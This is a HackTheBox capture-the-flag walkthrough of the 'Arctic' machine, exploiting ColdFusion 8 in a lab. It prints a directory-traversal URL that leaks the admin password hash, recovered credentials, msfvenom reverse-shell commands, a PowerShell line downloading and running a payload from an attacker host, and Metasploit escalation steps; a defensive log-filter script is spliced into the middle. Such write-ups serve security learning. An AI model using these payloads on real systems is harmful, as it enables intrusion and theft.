
HackTheBox | Arctic Walkthrough

6 min read. Written by Nautilus

Arctic is a pretty easy machine to exploit. To achieve user.txt and root.txt this machine requires some basic enumeration, discovery, and exploitation skills.

user.txt

Let's start off with a basic nmap scan:

nmap -sC -sV 10.10.10.16
-sC: equivalent to --script=default
-sV: Probe open ports to determine service/version info

After browsing to 10.10.10.11:8500 we are shown the following:

After browsing to CFIDE/ we find some more goodies:

Let's try browsing to administrator/ to see if there's a panel:

As we can see, we're presented with a "ColdFusion Administrator Login" page. Let's Google exploits for ColdFusion 8:

The first exploit we find is a Directory Traversal exploit. Let's look into that and see what's going on:

After further inspection it looks like we only need to modify the URL a little. This means our URL should be the following:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
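A defender's view of the same request pattern, as an added example that is not part of the original walkthrough: a short Python filter over constructed Common Log Format lines that flags CFIDE requests whose locale parameter carries traversal sequences or a %00 null byte.

```python
"""Flag ColdFusion 8 'locale' directory-traversal requests in an access log.

Added example, not from the original walkthrough. Assumes a Common Log Format
access log from a web server or reverse proxy in front of ColdFusion; the
sample lines below are constructed, not real traffic.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample log lines (Common Log Format).
SAMPLE_LOG = """\
10.10.14.23 - - [01/Jan/2020:10:00:01 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 1234
10.10.14.23 - - [01/Jan/2020:10:00:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 512
10.10.14.23 - - [01/Jan/2020:10:00:03 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 4321
"""

# Extracts the method and request target from the quoted request field.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_traversal(value: str) -> bool:
    """True if a decoded parameter value walks up directories or embeds a
    null byte (the %00 truncation trick in the walkthrough's URL)."""
    decoded = unquote(value)
    return ".." in decoded.replace("\\", "/") or "\x00" in decoded


def suspicious_requests(log_text: str) -> list:
    """Return one finding per log line whose 'locale' parameter looks like a
    traversal attempt against a page under /CFIDE/."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.lower().startswith("/cfide/"):
            continue
        # parse_qs percent-decodes values, so %00 arrives here as a real NUL.
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("locale", []):
            if is_traversal(value):
                findings.append({
                    "client": line.split()[0],
                    "path": parts.path,
                    "locale": unquote(value),
                })
    return findings
```

Alerting on the decoded value rather than the raw URL matters: the same traversal can be written with %2e%2e or backslashes and still reach the same file.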

Let's submit this request and see what happens:

Looks like we have a password hash. Let's throw this into Google and see if we get any results:

Clicking on the first link revealed that it's a SHA-1 hash and that the recovered plaintext is the password happyday. Since we know the username is admin, our working credentials should be:

admin:happyday

Let's try these credentials and see if our login is successful:

Looks like we logged in successfully to the administrator panel. The first place I checked upon logging in was "Mappings", which presented the following information that will come in handy later:

After looking around for a little while I found something interesting in Debugging & Logging. It seems that we are able to grab a file from a URL and execute it as a scheduled task:

Let's create a shell, host it via a SimpleHTTPServer and see if it pops.

To begin this attack method we're going to create a JSP reverse shell payload in msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

Now that it's generated, let's host it with a SimpleHTTPServer:

Now we need to set up a handler in Metasploit:

As we saw from the directory paths earlier we should be able to save our file to:

C:\ColdFusion8\wwwroot\CFIDE\example.jsp

Now let's submit our task and see if we get confirmation of our shell being grabbed from the SimpleHTTPServer:

Great! Now let's browse to our file and see if our handler grabs it:

http://10.10.10.11:8500/CFIDE/example.jsp

After browsing to C:\Users\tolis\Desktop we find the user.txt flag:

root.txt

We're currently logged into the system as "tolis". However, since this is a Windows box, we want to get a shell as NT AUTHORITY\SYSTEM. Let's first upgrade our shell to a Meterpreter shell. We're going to do this in the same way that we got a shell onto the machine, via a SimpleHTTPServer, except this time we're going to fetch it from PowerShell.

To begin, let's create a windows reverse_tcp shell with msfvenom:

Now that we've created and hosted the shell let's set up our handler:

Now let's call the script from our SimpleHTTPServer using Powershell on the target machine:

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.23/shell.exe', 'juicyshell.exe')"

As we can see, "juicyshell.exe" has been created in the directory. Now we just need to run it, which can be accomplished with the following command:

powershell start-process juicyshell.exe

After starting the process we get our Meterpreter session:

After starting interaction with our session we're going to run local_exploit_suggester to see if we can find some vulns:

run post/multi/recon/local_exploit_suggester

Great! It looks like we have a lot of exploits to choose from. Let's start from the top with exploit/windows/local/bypassuac_eventvwr:

No luck with this exploit. Let's move onto exploit/windows/local/ms10_092_schelevator:

So the exploit was aborted because we're not using an x64 Meterpreter. Let's migrate into an x64 process to fix the issue:

From listing running processes we find quite a few x64 processes. Let's migrate into conhost.exe:

Success! Now let's try running the exploit again:

Now let's check if we've successfully escalated our privileges:

Great! Now let's go grab the root flag to finish off the box:

Final Thoughts

I really enjoyed obtaining both flags on this box. I'm much more comfortable in a Linux environment but I learn more about Powershell in the command line every time I work on a Windows box. For example - I kept on trying to start my commands with "PS" rather than "Powershell". A small error, but one that can be diagnosed quickly and remedied painlessly.

I'd recommend this box to anyone who's looking to learn a little about Windows machines - it was certainly a fun and interactive path to own root!

Thanks for reading, I hope you learned something new from this machine!